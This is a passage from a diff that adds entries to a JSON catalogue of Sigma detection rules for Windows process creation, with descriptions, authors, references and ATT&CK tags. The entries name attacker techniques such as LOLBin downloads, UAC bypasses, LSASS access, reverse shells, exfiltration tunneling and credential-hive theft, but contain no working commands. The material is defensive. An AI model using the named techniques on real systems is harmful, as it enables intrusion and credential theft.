"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "74403157-20f5-415d-89a7-c505779585cf", + "value": "Encoded PowerShell Command Line Usage of ConvertTo-SecureString" + }, + { + "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", + "meta": { + "author": "Romaissa Adjailia, FLorian Roth", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "filename": "proc_creation_win_susp_psexesvc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.youtube.com/watch?v=ro2QuZTIMBM", + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", + "value": "PsExec Service Execution" + }, + { + "description": "Download and compress a remote file and store it in a cab file on local machine.", + "meta": { + "author": "frack113", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "185d7418-f250-42d0-b72e-0c8b70661e93", + "value": "Suspicious Diantz Download and Compress Into a CAB File" + }, + { + "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/28", + "falsepositive": [ + "Some legitimate apps use this, but limited." + ], + "filename": "proc_creation_win_bitsadmin_download_susp_domain.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://isc.sans.edu/diary/22264", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ] + }, + "uuid": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", + "value": "Bitsadmin Download from Suspicious Domain" + }, + { + "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/09", + "falsepositive": [ + "Legitimate usage of Adplus" + ], + "filename": "proc_creation_win_lolbin_adplus.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1534915321856917506", + "https://twitter.com/nas_bench/status/1534916659676422152", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1003.001" + ] + }, + "uuid": "2f869d59-7f6a-4931-992c-cce556ff2d53", + "value": "Use of Adplus.exe" + }, + { + "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali @nas_bench", + "creation_date": "2022/01/24", + "falsepositive": [ + "Legitimate use by administrators" + ], + "filename": "proc_creation_win_tool_nircmd_as_system.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://www.nirsoft.net/utils/nircmd.html", + "https://www.nirsoft.net/utils/nircmd2.html#using", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "value": "NirCmd Tool Execution As LOCAL SYSTEM" + }, + { + "description": "Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets", + "meta": { + "author": "pH-T", + "creation_date": "2022/05/31", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_base64_invoke_susp_cmdlets.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_invoke_susp_cmdlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "fd6e2919-3936-40c9-99db-0aa922c356f7", + "value": "Malicious Base64 Encoded Powershell Invoke Cmdlets" + }, + { + "description": "Detects wmiexec vbs version execution by wscript or cscript", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/04/07", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_apt_cloudhopper.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml" + ], + "tags": [ + "attack.execution", + "attack.g0045", + "attack.t1059.005" + ] + }, + "uuid": "966e4016-627f-44f7-8341-f394905c361f", + "value": "WMIExec VBS Script" + }, + { + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_taskmgr_localsystem.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskmgr_localsystem.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "value": "Taskmgr as LOCAL_SYSTEM" + }, + { + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/04/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_getprocess_lsass.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/PythonResponder/status/1385064506049630211", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ] + }, + "uuid": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", + "value": "PowerShell Get-Process LSASS" + }, + { + "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_sftp.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/264", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "a85ffc3a-e8fd-4040-93bf-78aff284d801", + "value": "Use Of The SFTP.EXE Binary As A LOLBIN" + }, + { + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/IDiagnosticProfileUAC", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "4cbef972-f347-4170-b62a-8253f6168e6d", + "value": "UAC Bypass Using IDiagnostic Profile" + }, + { + "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/05", + "falsepositive": [ + "Use of Program Compatibility Troubleshooter Helper" + ], + "filename": "proc_creation_win_susp_pcwutl.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/", + "https://twitter.com/harr0ey/status/989617817849876488", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pcwutl.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", + "value": "Code Execution via Pcwutl.dll" + }, + { + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, Anton Kutepov, oscd.community", + "creation_date": "2017/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_webshell_detection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/", + "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_detection.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" + ] + }, + "uuid": "bed2a484-9348-4143-8a8a-b801c979301c", + "value": "Webshell Detection With Command Line Keywords" + }, + { + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_conhost_path_traversal.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2020/07/06/indirect-command-execution/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "ee5e119b-1f75-4b34-add8-3be976961e39", + "value": "Conhost.exe CommandLine Path Traversal" + }, + { + "description": "Detects renamed jusched.exe used by cobalt group", + "meta": { + "author": "Markus Neis, Swisscom", + "creation_date": "2019/06/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_renamed_jusched.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_jusched.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", + "value": "Renamed jusched.exe" + }, + { + "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "meta": { + "author": "frack113", + "creation_date": "2022/01/30", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "filename": "proc_creation_win_susp_takeown.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_takeown.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.001" + ] + }, + "uuid": "554601fb-9b71-4bcc-abf4-21a611be4fde", + "value": "Suspicious Recursive Takeown" + }, + { + "description": "Detects execution of msiexec from an uncommon directory", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/11/14", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_msiexec_cwd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/200_okay_/status/1194765831911215104", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msiexec_cwd.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "value": "Suspicious MsiExec Directory" + }, + { + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_wmp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", + "value": "UAC Bypass Using Windows Media Player - Process" + }, + { + "description": "Execution of plink to perform data exfiltration and tunneling", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/04", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_plink_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ] + }, + "uuid": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "value": "Suspicious Plink Usage RDP Tunneling" + }, + { + "description": "Detects suspicious inline VBScript keywords as used by UNC2452", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_vbscript_unc2452.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vbscript_unc2452.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", + "value": "Suspicious VBScript UN2452 Pattern" + }, + { + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_taidoor.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_taidoor.yml" + ], + "tags": [ + "attack.execution", + "attack.t1055.001" + ] + }, + "uuid": "d1aa3382-abab-446f-96ea-4de52908210b", + "value": "TAIDOOR RAT DLL Load" + }, + { + "description": "Detects the exploitation of PrinterNightmare to get a shell as LOCAL_SYSTEM", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_systemnightmare.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/GossiTheDog/SystemNightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_systemnightmare.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "value": "SystemNightmare Exploitation Script Execution" + }, + { + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_wermgr.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.echotrail.io/insights/search/wermgr.exe", + "https://github.com/binderlabs/DirCreate2System", + "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml" + ], + "tags": "No established tags" + }, + "uuid": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", + "value": "Suspicious WERMGR Process Patterns" + }, + { + "description": "Detects suspicious process related to rasdial.exe", + "meta": { + "author": "juju4", + "creation_date": "2019/01/16", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_rasdial_activity.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/subTee/status/891298217907830785", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rasdial_activity.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", + "value": "Suspicious RASdial Activity" + }, + { + "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_missing_spaces.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1562072617552678912", + "https://ss64.com/nt/cmd.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a16980c2-0c56-4de0-9a79-17971979efdd", + "value": "Missing Space Characters in Command Lines" + }, + { + "description": "Detects defence evasion attempt via odbcconf.exe execution to load DLL", + "meta": { + "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate use of odbcconf.exe by legitimate user" + ], + "filename": "proc_creation_win_susp_odbcconf.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/raspberry-robin/", + "https://twitter.com/Hexacorn/status/1187143326673330176", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca", + "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_odbcconf.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.008" + ] + }, + "uuid": "65d2be45-8600-4042-b4c0-577a1ff8a60e", + "value": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe" + }, + { + "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_mspub_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", + "value": "Download Arbitrary Files Via MSPUB.EXE" + }, + { + "description": "Detects usage of Dsacls to grant over permissive permissions", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate administrators granting over permissive permissions to users" + ], + "filename": "proc_creation_win_dsacls_abuse_permissions.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://ss64.com/nt/dsacls.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "01c42d3c-242d-4655-85b2-34f1739632f7", + "value": "Abusing Permissions Using Dsacls" + }, + { + "description": "Detects execution of perl using the \"-e\"/\"-E\" flags. This is could be used as a way to launch a reverse shell or execute live perl code.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_perl_inline_command_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", + "https://www.revshells.com/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_perl_inline_command_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "f426547a-e0f7-441a-b63e-854ac5bdf54d", + "value": "Perl Inline Command Execution" + }, + { + "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", + "meta": { + "author": "frack113", + "creation_date": "2022/05/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_gpresult.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gpresult.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1615" + ] + }, + "uuid": "e56d3073-83ff-4021-90fe-c658e0709e72", + "value": "Gpresult Display Group Policy Information" + }, + { + "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", + "meta": { + "author": "Georg Lauenstein", + "creation_date": "2022/09/19", + "falsepositive": [ + "Other programs that use the same command line flags" + ], + "filename": "proc_creation_win_winpeas_tool.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation", + "https://github.com/carlospolop/PEASS-ng", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1082", + "attack.t1087", + "attack.t1046" + ] + }, + "uuid": "98b53e78-ebaf-46f8-be06-421aafd176d9", + "value": "Detect Execution of winPEAS" + }, + { + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "meta": { + "author": "Austin Songer (@austinsonger)", + "creation_date": "2021/10/21", + "falsepositive": [ + "Legitimate usage of stordiag.exe." + ], + "filename": "proc_creation_win_stordiag_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html", + "https://twitter.com/eral4m/status/1451112385041911809", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stordiag_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "value": "Execution via stordiag.exe" + }, + { + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "meta": { + "author": "Ecco, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/09/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_impacket_lateralization.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_lateralization.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.003" + ] + }, + "uuid": "10c14723-61c7-4c75-92ca-9af245723ad2", + "value": "Impacket Lateralization Detection" + }, + { + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate use of Pester for writing tests for Powershell scripts and modules" + ], + "filename": "proc_creation_win_susp_pester.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Oddvarmoe/status/993383596244258816", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", + "value": "Execute Code with Pester.bat" + }, + { + "description": "Detects creation of a new service.", + "meta": { + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Legitimate administrator or user creates a service for legitimate reasons." + ], + "filename": "proc_creation_win_new_service_creation.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_service_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "7fe71fc9-de3b-432a-8d57-8c809efc10ab", + "value": "New Service Creation" + }, + { + "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", + "meta": { + "author": "pH-T", + "creation_date": "2022/07/15", + "falsepositive": [ + "Software installation" + ], + "filename": "proc_creation_win_schtasks_once_0000.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_once_0000.yml" + ], + "tags": "No established tags" + }, + "uuid": "970823b7-273b-460a-8afc-3a6811998529", + "value": "Uncommon Scheduled Task Once 00:00" + }, + { + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" + ] + }, + "uuid": "75578840-9526-4b2a-9462-af469a45e767", + "value": "Serv-U Exploitation CVE-2021-35211 by DEV-0322" + }, + { + "description": "Detects a command that accesses password storing registry hives via volume shadow 